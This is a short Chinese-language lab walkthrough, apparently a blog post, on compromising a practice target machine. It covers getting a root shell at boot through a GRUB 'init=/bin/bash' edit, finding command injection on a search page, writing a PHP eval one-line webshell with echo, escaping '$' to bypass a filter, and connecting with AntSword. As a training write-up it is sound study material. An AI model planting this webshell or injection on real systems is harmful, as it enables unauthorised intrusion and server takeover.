首先kali终端运行以下命令查看靶机ip

这里我们发现并没有查到靶机的ip,这时我们重启靶机
打开靶机,按下shift,出现下图界面

再次按下e键,进入到如下界面

将ro替换为rw signie init=/bin/bash


替换完毕后,按下Ctrl键+X键,进入如下页面

输入vi /etc/network/interfaces编辑网卡信息,改完后按shift+?键才能输出保存,修改完成后重启靶机即可


然后来到kali终端,继续运行以下命令查看靶机ip

这样我们就可以得到靶机的ip了
浏览器访问此ip

点击site文件夹,网页跳转

把所有的功能点都点一遍,当我们点击Buscar时,出现以下页面,发现有传参的地方


输入命令看看能不能执行,发现成功解析

那么我们就可以确定该处存在命令执行漏洞
尝试将一句话木马写入文件中,具体代码如下
echo "<?php @eval($_POST[a]);?>" > 1.php

再次写入一个1.txt文件,测试是否成功写入
echo "<?php @eval($_POST[a]);?>" > 1.txt

接下来访问这个文件,发现传参方式被过滤

可以在被过滤的地方加一个反斜杠,再次写入
echo "<?php @eval(\$_POST[a]);?>" > 1.txt

再次访问1.txt,测试可以成功写入

修改后缀名为1.php,重新写入
echo "<?php @eval(\$_POST[a]);?>" > 1.php

尝试访问1.php,蚁剑连接


连接成功,获取getshell

靶机IP获取与命令执行漏洞利用
702

被折叠的 条评论
为什么被折叠?



